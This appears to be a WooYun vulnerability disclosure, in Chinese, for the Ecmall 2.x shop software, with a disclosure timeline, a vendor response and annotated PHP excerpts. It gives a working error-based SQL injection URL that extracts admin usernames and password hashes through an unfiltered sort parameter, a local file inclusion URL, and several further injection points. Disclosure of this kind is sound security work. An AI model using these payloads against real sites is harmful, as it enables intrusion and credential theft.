Ecmall 2.x 多处安全漏洞汇总

漏洞详情

披露状态:

2014-02-28: 细节已通知厂商并且等待厂商处理中
2014-02-28: 厂商已经确认,细节仅向厂商公开
2014-03-03: 细节向第三方安全合作伙伴开放
2014-03-10: 细节向核心白帽子及相关领域专家公开
2014-03-20: 细节向普通白帽子公开
2014-04-09: 细节向实习白帽子公开
2014-05-29: 细节向公众公开

简要描述:

一处通杀注入,同文件多处鸡肋注入,一处本地包含。累了不看了,体力活。。。

详细说明:

通杀注入:http://localhost/ecmall/index.php?app=my_goods&act=brand_list&order=asc&sort=1 and (select user_name from ecm_member where user_id=1 union select 1 from (select count(*),concat(floor(rand(0)*2),(select concat(user_name,password) from ecm_member limit 0,1))a from information_schema.tables group by a)b)%23



app/my_goods.app.php

function brand_list()
{
$_GET['store_id'] = $this->_store_id;
$_GET['if_show'] = BRAND_PASSED;
$con = array(
array(
'field' => 'store_id',
'name' => 'store_id',
'equal' => '=',
),
array(
'field' => 'if_show',
'name' => 'if_show',
'equal' => '=',
'assoc' => 'or',
),);
$filtered = '';
if (!empty($_GET['brand_name']) || !empty($_GET['store']))
{
$_GET['brand_name'] && $filtered = " AND brand_name LIKE '%{$_GET['brand_name']}%'";
$_GET['store'] && $filtered = $filtered . " AND store_id = " . $this->_store_id;
}
if (isset($_GET['sort']) && isset($_GET['order']))
{
$sort = strtolower(trim($_GET['sort']));
$order = strtolower(trim($_GET['order']));
if (!in_array($order,array('asc','desc'))) //依然只过滤了order,没有过滤sort
{
$sort = 'store_id';
$order = 'desc';
}
}
else
{
$sort = 'store_id';
$order = 'desc';
}
$page = $this->_get_page(10);
$conditions = $this->_get_query_conditions($con);
$brand = $this->_brand_mod->find(array(
'conditions' => "(1=1 $conditions)" . $filtered,
'limit' => $page['limit'],
'order' => "$sort $order", //带入查询 order by参数注入.
'count' => true,
));
$page['item_count'] = $this->_brand_mod->getCount();
......
}





本地包含漏洞:http://localhost/ecmall/index.php?app=my_payment&act=install&code=wooyun



app/my_payment.app.php

function install()
{
$code = isset($_GET['code']) ? trim($_GET['code']) : 0; //没过滤
if (!$code)
{
echo Lang::get('no_such_payment');

return;
}
$model_payment =& m('payment');
$payment = $model_payment->get_builtin_info($code); //跟进
if (!$payment)
{
echo Lang::get('no_such_payment');

return;
}
$payment_info = $model_payment->get("store_id=" . $this->visitor->get('manage_store') . " AND payment_code='{$code}'");
if (!empty($payment_info))
{
echo Lang::get('already_installed');

return;
}
......
}
includes/models/paymet.model.php
<code>
function get_builtin_info($code)
{
Lang::load(lang_file('payment/' . $code));
$payment_path = ROOT_PATH . '/includes/payments/' . $code . '/payment.info.php';

return include($payment_path); //包含之.
}







鸡肋注入:http://localhost/ecmall/index.php?app=seller_groupbuy&act=edit&id=1'

http://localhost/ecmall/index.php?app=seller_groupbuy&act=xxxxxxxx&id=1'

需要开启团购活动



app/seller_groupbuy.app.php

function edit()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //没过滤,下面还有很多类似的
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) //带入查询
{
$this->show_warning('Hacking Attempt');
return;
}
......
}

function drop()
{
$id = empty($_GET['id']) ? 0 : $_GET['id']; //下同
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) //下同
{
$this->show_warning('Hacking Attempt');
return;
}
......
}

function start()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
......
}

function finished()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id, //同样带入查询
'fields' => 'group_name',
));
......
}

function desc()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
......
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc',
));
......
}

function cancel()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT))
{
$this->show_warning('Hacking Attempt');
return;
}
/* 团购信息 */
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc,group_name,owner_name',
'join' => 'belong_store'
));

}

function log()
{
$id = empty($_GET['id']) ? 0 : $_GET['id'];
if (!$id)
{
$this->show_warning('no_such_groupbuy');
return false;
}
if (!$this->_ican($id, ACT)) {
$this->show_warning('Hacking Attempt');
return;
}
$group = $this->_groupbuy_mod->get(array(
'conditions' => 'group_id=' . $id,
'fields' => 'group_desc, group_name, goods_id',
));
}

漏洞证明:

1.jpg

2.jpg

3.jpg

4.jpg

修复方案:

过滤

版权声明:转载请注明来源 Chora@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2014-02-28 11:30

厂商回复:

非常感谢您为shopex信息安全做的贡献
该漏洞通过其他渠道已经提交过,并在处理中
谢谢

最新状态:

暂无


漏洞评价: